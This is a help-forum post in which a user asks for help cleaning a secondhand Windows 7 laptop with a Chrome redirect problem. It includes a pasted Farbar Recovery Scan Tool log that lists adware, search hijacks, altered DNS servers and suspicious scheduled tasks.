
Chrome Redirect Virus on "New" Laptop


  • This topic is locked
8 replies to this topic

#1 starblazers


Posted 22 March 2018 - 08:22 PM

Hi, I bought a used laptop at a thrift store and wanted to make sure it was clean of bugs and surprises before I started using it for anything. So, I fire it up and see several programs I don't recognize on the desktop. I uninstall them, and then fire up Chrome and try to come to Bleeping Computer to see about posting a topic requesting help. While reading the Prep Guide on the website, the page redirects and starts warning about my computer being infected. Also, not necessarily another problem, but I notice that the laptop seems to have three total hard drives, labeled as follows:

C: which has 233 GB free out of 277 GB

and

HP_RECOVERY (E:) which has 2.26 GB free out of 15.1 GB

and

HP_TOOLS (F:) which has 2.12 GB free out of 4.98 GB

 

So, what I would like to do, if possible, is get it free of bugs and such and then also wipe any other user profiles left behind by the previous owner.  I have never owned a laptop before, so I don't want to accidentally delete something I need in order to run the laptop.  Any and all help will be greatly appreciated.

FRST and Addition.txt files are as follows:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 14.03.2018
Ran by Tech 14 (administrator) on MERIDIAN (21-03-2018 23:11:42)
Running from C:\Users\Tech 14\Desktop
Loaded Profiles: Tech 14 (Available Profiles: Tech 14)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Google Inc.) C:\Users\Tech 14\AppData\Local\Google\Update\GoogleUpdate.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP QuickWeb\hpqwutils.exe
(Sun Microsystems, Inc.) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Andrea Electronics Corporation) C:\Program Files\IDT\WDM\AESTSr64.exe
(Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe
(Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\HPDrvMntSvc.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Ericsson AB) C:\Program Files (x86)\Ericsson\Mobile Broadband Drivers\WMCore\mini_WMCore.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\mediasrv.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\btplayerctrl.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Sun Microsystems, Inc.) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2837288 2011-10-14] (Synaptics Incorporated)
HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshell.dll",TrayApp
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1128448 2011-06-30] (IDT, Inc.)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1271072 2014-03-11] (Microsoft Corporation)
HKLM-x32\...\Run: [PDF Complete] => C:\Program Files (x86)\PDF Complete\pdfsty.exe
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-19] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [574008 2011-07-11] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [336384 2011-06-29] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [HPQuickWebProxy] => c:\Program Files (x86)\Hewlett-Packard\HP QuickWeb\hpqwutils.exe [169528 2011-09-01] (Hewlett-Packard Company)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [252296 2012-01-17] (Sun Microsystems, Inc.)
HKLM-x32\...\Run: [mobilegeni daemon] => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe*******************************************************************************
HKU\S-1-5-21-893956484-597186715-3571521862-1000\...\Run: [Google Update] => C:\Users\Tech 14\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2012-06-15] (Google Inc.)
HKU\S-1-5-21-893956484-597186715-3571521862-1000\...\Run: [NextLive] => C:\windows\SysWOW64\rundll32.exe "C:\Users\Tech 14\AppData\Roaming\newnext.me\nengine.dll",EntryPoint -m l
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\Parameters: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{28414285-8C2B-4927-8707-AA2B9B7FB204}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{28414285-8C2B-4927-8707-AA2B9B7FB204}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5286B5CE-14A3-436C-9257-AEA9C72C576A}: [DhcpNameServer] 199.203.131.151
Tcpip\..\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}: [NameServer] 199.203.131.151 82.163.143.181
Tcpip\..\Interfaces\{5E3F2DF1-D74F-4019-83CD-DBE6FEFAEAD3}: [DhcpNameServer] 199.203.131.151
Tcpip\..\Interfaces\{EB149C09-0ED4-4B3D-A3A2-FCB4397AF082}: [NameServer] 172.26.38.1 172.26.38.2

Internet Explorer:
==================
HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.conduit.com/?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=55&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&SSPV=
HKU\S-1-5-21-893956484-597186715-3571521862-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPCOM/1
SearchScopes: HKLM -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-24/4?satitle={searchTerms}
SearchScopes: HKLM -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-24/4?satitle={searchTerms}
SearchScopes: HKLM-x32 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
SearchScopes: HKU\.DEFAULT -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\.DEFAULT -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\.DEFAULT -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL =
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> DefaultScope {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL = hxxp://search.conduit.com/Results.aspx?ctid=CT3317819&octid=EB_ORIGINAL_CTID&SearchSource=58&CUI=&UM=2&UP=SP9F570C5C-3FC4-4419-94F5-D8F29864BBC5&q={searchTerms}&SSPV=
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=CMNTDF
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=CMNTDF
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-24/4?satitle={searchTerms}
SearchScopes: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=CMNTDF&pc=CMNTDF&src=IE-SearchBox
BHO: Plus-HD-1.2 -> {11111111-1111-1111-1111-110311121155} -> C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-bho64.dll [2013-12-22] (Plus HD)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO: llEsss2pay -> {A555676B-2A0B-9B19-8CC1-D4ED88AC8618} -> C:\ProgramData\llEsss2pay\GZ5hjc9kDO.x64.dll [2014-04-22] ()
BHO-x32: Plus-HD-1.2 -> {11111111-1111-1111-1111-110311121155} -> C:\Program Files (x86)\Plus-HD-1.2\Plus-HD-1.2-bho.dll [2013-12-22] (Plus HD)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\ssv.dll [2012-04-04] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO-x32: llEsss2pay -> {A555676B-2A0B-9B19-8CC1-D4ED88AC8618} -> C:\ProgramData\llEsss2pay\GZ5hjc9kDO.dll [2014-04-22] ()
BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-08-01] (Microsoft Corporation.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\jp2ssv.dll [2012-04-04] (Oracle Corporation)
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-08-01] (Microsoft Corporation.)
Toolbar: HKU\S-1-5-21-893956484-597186715-3571521862-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} -  No File
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} hxxps://vendoraccess.twcable.com/dana-cached/sc/JuniperSetupClient.cab

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30214.0\npctrl.dll [2014-02-13] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\system32\Adobe\Director\np32dsw.dll [No File]
FF Plugin-x32: @java.com/DTPlugin,version=10.4.1 -> C:\windows\SysWOW64\npDeployJava1.dll [2012-04-04] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.4.1 -> C:\Program Files (x86)\Oracle\JavaFX 2.1 Runtime\bin\plugin2\npjp2.dll [2012-04-04] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll [2014-02-13] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2010-12-07] ()
FF Plugin HKU\S-1-5-21-893956484-597186715-3571521862-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Tech 14\AppData\Local\Google\Update\1.3.23.9\npGoogleUpdate3.dll [2014-04-22] (Google Inc.)
FF Plugin HKU\S-1-5-21-893956484-597186715-3571521862-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Tech 14\AppData\Local\Google\Update\1.3.23.9\npGoogleUpdate3.dll [2014-04-22] (Google Inc.)

Chrome:
=======
CHR DefaultProfile: Default
StartMenuInternet: Google Chrome - C:\Users\Tech 14\AppData\Local\Google\Chrome\Application\chrome.exe

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 ACDaemon; C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1364096 2016-05-25] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1687680 2016-05-25] (Microsoft Corporation)
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [86528 2012-09-27] (Hewlett-Packard Company) [File not signed]
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2014-03-11] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [347872 2014-03-11] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 WMCoreService; C:\Program Files (x86)\Ericsson\Mobile Broadband Drivers\WMCore\mini_WMCore.exe [652328 2011-09-13] (Ericsson AB)
S2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService [X] <==== ATTENTION

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 ecnssndis; C:\windows\System32\Drivers\wwuss64.sys [26664 2011-09-05] (Ericsson AB)
R3 ecnssndisfltr; C:\windows\System32\Drivers\wwussf64.sys [29736 2011-09-05] (Ericsson AB)
R3 h36wgps; C:\windows\System32\DRIVERS\h36wgps64.sys [102440 2011-09-06] (Ericsson AB)
R3 Mbm3CBus; C:\windows\System32\DRIVERS\Mbm3CBus.sys [419400 2011-08-22] (MCCI Corporation)
R3 Mbm3DevMt; C:\windows\System32\DRIVERS\Mbm3DevMt.sys [430664 2011-08-22] (MCCI Corporation)
R3 Mbm3mdfl; C:\windows\System32\DRIVERS\Mbm3mdfl.sys [19528 2011-08-22] (MCCI Corporation)
R3 Mbm3Mdm; C:\windows\System32\DRIVERS\Mbm3Mdm.sys [483400 2011-08-22] (MCCI Corporation)
R0 MpFilter; C:\windows\System32\DRIVERS\MpFilter.sys [268512 2014-01-25] (Microsoft Corporation)
R2 NisDrv; C:\windows\System32\DRIVERS\NisDrvWFP.sys [133928 2014-03-11] (Microsoft Corporation)
R3 WwanUsbServ; C:\windows\System32\DRIVERS\WwanUsbMp64.sys [279080 2011-09-07] (Ericsson AB)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-21 23:11 - 2018-03-21 23:13 - 000017873 _____ C:\Users\Tech 14\Desktop\FRST.txt
2018-03-21 23:11 - 2018-03-21 23:11 - 000000000 ____D C:\FRST
2018-03-21 23:09 - 2018-03-21 23:09 - 002403328 _____ (Farbar) C:\Users\Tech 14\Desktop\FRST64.exe
2018-03-21 12:53 - 2018-03-21 12:53 - 000000000 ____D C:\Users\Tech 14\AppData\Local\Xobni

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-03-21 23:10 - 2009-07-14 00:45 - 000028576 ____H C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-03-21 23:10 - 2009-07-14 00:45 - 000028576 ____H C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-03-21 23:05 - 2012-06-15 09:59 - 000000916 _____ C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-893956484-597186715-3571521862-1000UA.job
2018-03-21 23:03 - 2013-12-22 20:14 - 000001332 _____ C:\windows\Tasks\Plus-HD-1.2-updater.job
2018-03-21 23:03 - 2013-12-22 20:14 - 000001134 _____ C:\windows\Tasks\Plus-HD-1.2-enabler.job
2018-03-21 23:03 - 2013-12-22 20:13 - 000001234 _____ C:\windows\Tasks\Plus-HD-1.2-codedownloader.job
2018-03-21 23:03 - 2013-12-22 20:12 - 000002108 _____ C:\windows\Tasks\Plus-HD-1.2-firefoxinstaller.job
2018-03-21 23:03 - 2013-12-22 20:11 - 000001980 _____ C:\windows\Tasks\Plus-HD-1.2-chromeinstaller.job
2018-03-21 23:02 - 2009-07-14 01:08 - 000000006 ____H C:\windows\Tasks\SA.DAT
2018-03-21 22:15 - 2012-04-23 10:26 - 000003938 _____ C:\windows\System32\Tasks\User_Feed_Synchronization-{E55834A3-33FF-4B6A-BAAC-C0C048D6F970}
2018-03-21 13:12 - 2013-12-22 20:11 - 000000000 ____D C:\Program Files (x86)\MyPC Backup
2018-03-21 13:09 - 2012-09-05 15:56 - 000000000 ___RD C:\Program Files (x86)\Skype
2018-03-21 13:09 - 2012-09-05 15:56 - 000000000 ____D C:\ProgramData\Skype
2018-03-21 12:57 - 2013-12-23 11:29 - 000000000 ____D C:\Users\Tech 14\AppData\LocalLow\Plus-HD-1.2
2018-03-21 12:52 - 2013-12-22 20:14 - 000000000 ____D C:\Users\Tech 14\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mobogenie
2018-03-21 12:52 - 2013-12-22 20:14 - 000000000 ____D C:\Users\Tech 14\AppData\Local\Mobogenie
2018-03-21 12:50 - 2012-06-15 10:25 - 000000000 ____D C:\Users\Tech 14\AppData\Local\PokerStars.NET
2018-03-21 12:50 - 2012-06-15 10:25 - 000000000 ____D C:\Program Files (x86)\PokerStars.NET
2018-03-21 12:41 - 2013-12-22 20:12 - 000000000 ____D C:\ProgramData\TEMP
2018-03-21 12:13 - 2012-09-05 15:57 - 000000000 ____D C:\Users\Tech 14\AppData\Roaming\Skype
2018-03-19 18:27 - 2013-12-22 20:14 - 000008059 _____ C:\Users\Tech 14\daemonprocess.txt
2018-03-19 18:27 - 2012-08-30 18:08 - 000000000 ____D C:\Users\Tech 14\AppData\Roaming\SoftGrid Client
2018-03-19 15:45 - 2016-07-18 23:52 - 000000000 ____D C:\ProgramData\{0b6c3ba4-10c8-1}
2018-03-19 15:45 - 2016-07-18 23:52 - 000000000 ____D C:\ProgramData\{0a376664-50c8-0}

Some files in TEMP:
====================
2013-02-06 17:29 - 2013-02-06 17:29 - 000000000 _____ () C:\Users\Tech 14\AppData\Local\Temp\.exe
2013-02-06 17:29 - 2013-02-06 17:30 - 000143240 _____ (Ask.com) C:\Users\Tech 14\AppData\Local\Temp\ApnStub.exe
2013-12-22 20:10 - 2013-12-22 20:10 - 010355400 _____ () C:\Users\Tech 14\AppData\Local\Temp\BackupSetup.exe
2014-04-25 17:10 - 2014-04-25 17:10 - 000565760 _____ (Appcaster) C:\Users\Tech 14\AppData\Local\Temp\D2M-Precheck.exe
2012-07-11 10:36 - 2012-07-11 10:37 - 022413696 _____ (Microsoft Corporation) C:\Users\Tech 14\AppData\Local\Temp\IPx64_1033.exe
2013-12-16 05:01 - 2013-12-16 05:01 - 000167812 _____ (Conduit) C:\Users\Tech 14\AppData\Local\Temp\nsf4A0E.exe
2013-12-16 05:01 - 2013-12-16 05:01 - 000167812 _____ (Conduit) C:\Users\Tech 14\AppData\Local\Temp\nsk3D60.exe
2013-12-16 05:01 - 2013-12-16 05:01 - 000167812 _____ (Conduit) C:\Users\Tech 14\AppData\Local\Temp\nsk73F9.exe
2014-04-08 09:06 - 2014-04-08 09:06 - 000156063 _____ (Conduit) C:\Users\Tech 14\AppData\Local\Temp\nskD972.exe
2013-12-16 05:01 - 2013-12-16 05:01 - 000167812 _____ (Conduit) C:\Users\Tech 14\AppData\Local\Temp\nsu5E94.exe
2013-04-30 15:56 - 2013-06-18 18:43 - 031668328 _____ (Skype Technologies S.A.) C:\Users\Tech 14\AppData\Local\Temp\SkypeSetup.exe
2013-11-07 21:20 - 2013-11-07 21:20 - 041580520 _____ (Hewlett-Packard                                             ) C:\Users\Tech 14\AppData\Local\Temp\sp58915.exe
2014-04-08 16:07 - 2014-04-08 16:07 - 006379728 _____ (Conduit) C:\Users\Tech 14\AppData\Local\Temp\SPSetup.exe
2013-11-07 21:21 - 2012-09-27 14:44 - 000114080 ____N (Hewlett-Packard Company) C:\Users\Tech 14\AppData\Local\Temp\UninstallHPSA.exe
2016-07-17 00:03 - 2016-07-17 00:03 - 000780800 _____ (Emirates) C:\Users\Tech 14\AppData\Local\Temp\upd70819.exe
2018-03-21 12:49 - 2012-06-15 10:37 - 000348160 _____ () C:\Users\Tech 14\AppData\Local\Temp\_unps.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\SysWOW64\wininit.exe => File is digitally signed
C:\windows\explorer.exe => File is digitally signed
C:\windows\SysWOW64\explorer.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\SysWOW64\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\SysWOW64\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\SysWOW64\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\dnsapi.dll => File is digitally signed
C:\windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2013-12-21 01:10

==================== End of FRST.txt ============================



Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Tech 14 (21-03-2018 23:14:46)
Running from C:\Users\Tech 14\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2012-04-23 14:08:30)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-893956484-597186715-3571521862-500 - Administrator - Disabled)
Guest (S-1-5-21-893956484-597186715-3571521862-501 - Limited - Disabled)
Tech 14 (S-1-5-21-893956484-597186715-3571521862-1000 - Administrator - Enabled) => C:\Users\Tech 14

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {641105E6-77ED-3F35-A304-765193BCB75F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Microsoft Security Essentials (Enabled - Up to date) {DF70E402-51D7-30BB-99B4-4D23E83BFDE2}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Flash Player 11 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 11.3.300.257 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.1.629 - Adobe Systems, Inc.)
Agatha Christie - Peril at End House (HKLM-x32\...\WTA-39699de3-e852-4297-a08f-f6825ed9204f) (Version: 2.2.0.95 - WildTangent) Hidden
